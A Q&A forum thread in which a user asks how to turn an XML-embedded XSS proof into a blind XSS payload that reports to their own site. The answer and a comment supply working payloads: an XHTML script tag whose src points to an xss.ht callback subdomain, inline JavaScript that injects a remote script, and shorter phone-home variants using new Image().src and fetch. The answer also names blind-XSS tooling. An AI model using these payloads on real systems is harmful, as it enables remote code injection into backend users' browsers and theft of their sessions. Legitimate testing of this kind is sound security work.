# Blind XSS Payload for xml file?

Tags: xss, file-upload, xml

I think i may have found a blind XSS. I can only upload xml files that are opened inside the backend. My questions is: How can i turn this payload into a blind xss payload to receive a ping to my website?

`<?xml version="1.0"?>
<foo>
<html xmlns:html='http://www.w3.org/1999/xhtml'>
<html:script>prompt(document.domain);</html:script>
</html>
</foo>`

What should i changed  from this string?

`<html:script>prompt(document.domain);</html:script>`

Answer (score 1):

A good resource for payloads in general is "payload all the things": https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#blind-xss

I don't see why most of their blind XSS payloads wouldn't work for your target:

Are XML attributes parsed as HTML attributes?

`<html:script  src=//yoursubdomain.xss.ht>prompt(document.domain);</html:script>`

If you're trying to stay inside the tags:

`<html:script>var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)</html:script>`

It has some other payloads you can try, as well as some tools that can be used to find blind XSS:

- XSSHunter
- bXSS
- ezXSS

Comment: `new Image().src='someurl'` is a simpler way to phone home. just `fetch(url)` works these days too. you can rewrite your example code shorter using object ref recycling: `document.body.appendChild(document.createElement(\'script\')).src='url'`... /bored